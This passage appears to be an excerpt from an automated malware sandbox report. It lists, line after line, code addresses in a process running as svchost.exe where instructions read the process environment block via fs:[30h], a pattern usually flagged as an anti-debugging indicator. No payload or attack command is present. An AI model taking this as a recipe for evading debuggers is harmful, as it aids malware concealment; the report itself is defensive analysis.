                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036551EF mov eax, dword ptr fs:[00000030h]7_2_036551EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036351ED mov eax, dword ptr fs:[00000030h]7_2_036351ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_037061E5 mov eax, dword ptr fs:[00000030h]7_2_037061E5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036601F8 mov eax, dword ptr fs:[00000030h]7_2_036601F8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F61C3 mov eax, dword ptr fs:[00000030h]7_2_036F61C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F61C3 mov eax, dword ptr fs:[00000030h]7_2_036F61C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366D1D0 mov eax, dword ptr fs:[00000030h]7_2_0366D1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366D1D0 mov ecx, dword ptr fs:[00000030h]7_2_0366D1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE1D0 mov eax, dword ptr fs:[00000030h]7_2_036AE1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE1D0 mov eax, dword ptr fs:[00000030h]7_2_036AE1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]7_2_036AE1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE1D0 mov eax, dword ptr fs:[00000030h]7_2_036AE1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE1D0 mov eax, dword ptr fs:[00000030h]7_2_036AE1D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_037051CB mov eax, dword ptr fs:[00000030h]7_2_037051CB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E11A4 mov eax, dword ptr fs:[00000030h]7_2_036E11A4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E11A4 mov eax, dword ptr fs:[00000030h]7_2_036E11A4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E11A4 mov eax, dword ptr fs:[00000030h]7_2_036E11A4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E11A4 mov eax, dword ptr fs:[00000030h]7_2_036E11A4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364B1B0 mov eax, dword ptr fs:[00000030h]7_2_0364B1B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03670185 mov eax, dword ptr fs:[00000030h]7_2_03670185
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EC188 mov eax, dword ptr fs:[00000030h]7_2_036EC188
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EC188 mov eax, dword ptr fs:[00000030h]7_2_036EC188
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B019F mov eax, dword ptr fs:[00000030h]7_2_036B019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B019F mov eax, dword ptr fs:[00000030h]7_2_036B019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B019F mov eax, dword ptr fs:[00000030h]7_2_036B019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B019F mov eax, dword ptr fs:[00000030h]7_2_036B019F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362A197 mov eax, dword ptr fs:[00000030h]7_2_0362A197
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362A197 mov eax, dword ptr fs:[00000030h]7_2_0362A197
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362A197 mov eax, dword ptr fs:[00000030h]7_2_0362A197
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03687190 mov eax, dword ptr fs:[00000030h]7_2_03687190
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03705060 mov eax, dword ptr fs:[00000030h]7_2_03705060
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov ecx, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641070 mov eax, dword ptr fs:[00000030h]7_2_03641070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365C073 mov eax, dword ptr fs:[00000030h]7_2_0365C073
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AD070 mov ecx, dword ptr fs:[00000030h]7_2_036AD070
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03632050 mov eax, dword ptr fs:[00000030h]7_2_03632050
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D705E mov ebx, dword ptr fs:[00000030h]7_2_036D705E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D705E mov eax, dword ptr fs:[00000030h]7_2_036D705E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365B052 mov eax, dword ptr fs:[00000030h]7_2_0365B052
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362A020 mov eax, dword ptr fs:[00000030h]7_2_0362A020
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362C020 mov eax, dword ptr fs:[00000030h]7_2_0362C020
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F903E mov eax, dword ptr fs:[00000030h]7_2_036F903E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F903E mov eax, dword ptr fs:[00000030h]7_2_036F903E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F903E mov eax, dword ptr fs:[00000030h]7_2_036F903E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F903E mov eax, dword ptr fs:[00000030h]7_2_036F903E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E016 mov eax, dword ptr fs:[00000030h]7_2_0364E016
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E016 mov eax, dword ptr fs:[00000030h]7_2_0364E016
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E016 mov eax, dword ptr fs:[00000030h]7_2_0364E016
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E016 mov eax, dword ptr fs:[00000030h]7_2_0364E016
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036550E4 mov eax, dword ptr fs:[00000030h]7_2_036550E4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036550E4 mov ecx, dword ptr fs:[00000030h]7_2_036550E4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]7_2_0362A0E3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036380E9 mov eax, dword ptr fs:[00000030h]7_2_036380E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362C0F0 mov eax, dword ptr fs:[00000030h]7_2_0362C0F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036720F0 mov ecx, dword ptr fs:[00000030h]7_2_036720F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov ecx, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov ecx, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov ecx, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov ecx, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_037050D9 mov eax, dword ptr fs:[00000030h]7_2_037050D9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AD0C0 mov eax, dword ptr fs:[00000030h]7_2_036AD0C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AD0C0 mov eax, dword ptr fs:[00000030h]7_2_036AD0C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B20DE mov eax, dword ptr fs:[00000030h]7_2_036B20DE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036590DB mov eax, dword ptr fs:[00000030h]7_2_036590DB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F60B8 mov eax, dword ptr fs:[00000030h]7_2_036F60B8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F60B8 mov ecx, dword ptr fs:[00000030h]7_2_036F60B8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363208A mov eax, dword ptr fs:[00000030h]7_2_0363208A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362D08D mov eax, dword ptr fs:[00000030h]7_2_0362D08D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03635096 mov eax, dword ptr fs:[00000030h]7_2_03635096
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365D090 mov eax, dword ptr fs:[00000030h]7_2_0365D090
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365D090 mov eax, dword ptr fs:[00000030h]7_2_0365D090
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366909C mov eax, dword ptr fs:[00000030h]7_2_0366909C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362B765 mov eax, dword ptr fs:[00000030h]7_2_0362B765
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362B765 mov eax, dword ptr fs:[00000030h]7_2_0362B765
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362B765 mov eax, dword ptr fs:[00000030h]7_2_0362B765
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362B765 mov eax, dword ptr fs:[00000030h]7_2_0362B765
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03638770 mov eax, dword ptr fs:[00000030h]7_2_03638770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03643740 mov eax, dword ptr fs:[00000030h]7_2_03643740
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03643740 mov eax, dword ptr fs:[00000030h]7_2_03643740
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03643740 mov eax, dword ptr fs:[00000030h]7_2_03643740
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366674D mov esi, dword ptr fs:[00000030h]7_2_0366674D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366674D mov eax, dword ptr fs:[00000030h]7_2_0366674D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366674D mov eax, dword ptr fs:[00000030h]7_2_0366674D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03630750 mov eax, dword ptr fs:[00000030h]7_2_03630750
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672750 mov eax, dword ptr fs:[00000030h]7_2_03672750
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672750 mov eax, dword ptr fs:[00000030h]7_2_03672750
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03703749 mov eax, dword ptr fs:[00000030h]7_2_03703749
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B4755 mov eax, dword ptr fs:[00000030h]7_2_036B4755
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EF72E mov eax, dword ptr fs:[00000030h]7_2_036EF72E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03633720 mov eax, dword ptr fs:[00000030h]7_2_03633720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364F720 mov eax, dword ptr fs:[00000030h]7_2_0364F720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364F720 mov eax, dword ptr fs:[00000030h]7_2_0364F720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364F720 mov eax, dword ptr fs:[00000030h]7_2_0364F720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F972B mov eax, dword ptr fs:[00000030h]7_2_036F972B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366C720 mov eax, dword ptr fs:[00000030h]7_2_0366C720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366C720 mov eax, dword ptr fs:[00000030h]7_2_0366C720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0370B73C mov eax, dword ptr fs:[00000030h]7_2_0370B73C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0370B73C mov eax, dword ptr fs:[00000030h]7_2_0370B73C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0370B73C mov eax, dword ptr fs:[00000030h]7_2_0370B73C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0370B73C mov eax, dword ptr fs:[00000030h]7_2_0370B73C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03629730 mov eax, dword ptr fs:[00000030h]7_2_03629730
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03629730 mov eax, dword ptr fs:[00000030h]7_2_03629730
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03665734 mov eax, dword ptr fs:[00000030h]7_2_03665734
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363973A mov eax, dword ptr fs:[00000030h]7_2_0363973A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363973A mov eax, dword ptr fs:[00000030h]7_2_0363973A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366273C mov eax, dword ptr fs:[00000030h]7_2_0366273C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366273C mov ecx, dword ptr fs:[00000030h]7_2_0366273C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366273C mov eax, dword ptr fs:[00000030h]7_2_0366273C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AC730 mov eax, dword ptr fs:[00000030h]7_2_036AC730
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03637703 mov eax, dword ptr fs:[00000030h]7_2_03637703
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03635702 mov eax, dword ptr fs:[00000030h]7_2_03635702
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03635702 mov eax, dword ptr fs:[00000030h]7_2_03635702
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366C700 mov eax, dword ptr fs:[00000030h]7_2_0366C700
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03630710 mov eax, dword ptr fs:[00000030h]7_2_03630710
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03660710 mov eax, dword ptr fs:[00000030h]7_2_03660710
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366F71F mov eax, dword ptr fs:[00000030h]7_2_0366F71F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366F71F mov eax, dword ptr fs:[00000030h]7_2_0366F71F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363D7E0 mov ecx, dword ptr fs:[00000030h]7_2_0363D7E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036527ED mov eax, dword ptr fs:[00000030h]7_2_036527ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036527ED mov eax, dword ptr fs:[00000030h]7_2_036527ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036527ED mov eax, dword ptr fs:[00000030h]7_2_036527ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036347FB mov eax, dword ptr fs:[00000030h]7_2_036347FB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036347FB mov eax, dword ptr fs:[00000030h]7_2_036347FB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363C7C0 mov eax, dword ptr fs:[00000030h]7_2_0363C7C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036357C0 mov eax, dword ptr fs:[00000030h]7_2_036357C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036357C0 mov eax, dword ptr fs:[00000030h]7_2_036357C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036357C0 mov eax, dword ptr fs:[00000030h]7_2_036357C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B97A9 mov eax, dword ptr fs:[00000030h]7_2_036B97A9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BF7AF mov eax, dword ptr fs:[00000030h]7_2_036BF7AF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BF7AF mov eax, dword ptr fs:[00000030h]7_2_036BF7AF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BF7AF mov eax, dword ptr fs:[00000030h]7_2_036BF7AF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BF7AF mov eax, dword ptr fs:[00000030h]7_2_036BF7AF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BF7AF mov eax, dword ptr fs:[00000030h]7_2_036BF7AF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_037037B6 mov eax, dword ptr fs:[00000030h]7_2_037037B6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036307AF mov eax, dword ptr fs:[00000030h]7_2_036307AF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365D7B0 mov eax, dword ptr fs:[00000030h]7_2_0365D7B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F7BA mov eax, dword ptr fs:[00000030h]7_2_0362F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F7BA mov eax, dword ptr fs:[00000030h]7_2_0362F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F7BA mov eax, dword ptr fs:[00000030h]7_2_0362F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F7BA mov eax, dword ptr fs:[00000030h]7_2_0362F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F7BA mov eax, dword ptr fs:[00000030h]7_2_0362F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F7BA mov eax, dword ptr fs:[00000030h]7_2_0362F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F7BA mov eax, dword ptr fs:[00000030h]7_2_0362F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F7BA mov eax, dword ptr fs:[00000030h]7_2_0362F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F7BA mov eax, dword ptr fs:[00000030h]7_2_0362F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EF78A mov eax, dword ptr fs:[00000030h]7_2_036EF78A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F866E mov eax, dword ptr fs:[00000030h]7_2_036F866E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F866E mov eax, dword ptr fs:[00000030h]7_2_036F866E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A660 mov eax, dword ptr fs:[00000030h]7_2_0366A660
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A660 mov eax, dword ptr fs:[00000030h]7_2_0366A660
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03669660 mov eax, dword ptr fs:[00000030h]7_2_03669660
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03669660 mov eax, dword ptr fs:[00000030h]7_2_03669660
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03662674 mov eax, dword ptr fs:[00000030h]7_2_03662674
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364C640 mov eax, dword ptr fs:[00000030h]7_2_0364C640
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E627 mov eax, dword ptr fs:[00000030h]7_2_0364E627
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F626 mov eax, dword ptr fs:[00000030h]7_2_0362F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F626 mov eax, dword ptr fs:[00000030h]7_2_0362F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F626 mov eax, dword ptr fs:[00000030h]7_2_0362F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F626 mov eax, dword ptr fs:[00000030h]7_2_0362F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F626 mov eax, dword ptr fs:[00000030h]7_2_0362F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F626 mov eax, dword ptr fs:[00000030h]7_2_0362F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F626 mov eax, dword ptr fs:[00000030h]7_2_0362F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F626 mov eax, dword ptr fs:[00000030h]7_2_0362F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F626 mov eax, dword ptr fs:[00000030h]7_2_0362F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03666620 mov eax, dword ptr fs:[00000030h]7_2_03666620
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03705636 mov eax, dword ptr fs:[00000030h]7_2_03705636
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03668620 mov eax, dword ptr fs:[00000030h]7_2_03668620
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363262C mov eax, dword ptr fs:[00000030h]7_2_0363262C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03661607 mov eax, dword ptr fs:[00000030h]7_2_03661607
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE609 mov eax, dword ptr fs:[00000030h]7_2_036AE609
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366F603 mov eax, dword ptr fs:[00000030h]7_2_0366F603
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364260B mov eax, dword ptr fs:[00000030h]7_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364260B mov eax, dword ptr fs:[00000030h]7_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364260B mov eax, dword ptr fs:[00000030h]7_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364260B mov eax, dword ptr fs:[00000030h]7_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364260B mov eax, dword ptr fs:[00000030h]7_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364260B mov eax, dword ptr fs:[00000030h]7_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364260B mov eax, dword ptr fs:[00000030h]7_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03633616 mov eax, dword ptr fs:[00000030h]7_2_03633616
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03633616 mov eax, dword ptr fs:[00000030h]7_2_03633616
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672619 mov eax, dword ptr fs:[00000030h]7_2_03672619
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C36EE mov eax, dword ptr fs:[00000030h]7_2_036C36EE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C36EE mov eax, dword ptr fs:[00000030h]7_2_036C36EE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C36EE mov eax, dword ptr fs:[00000030h]7_2_036C36EE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C36EE mov eax, dword ptr fs:[00000030h]7_2_036C36EE
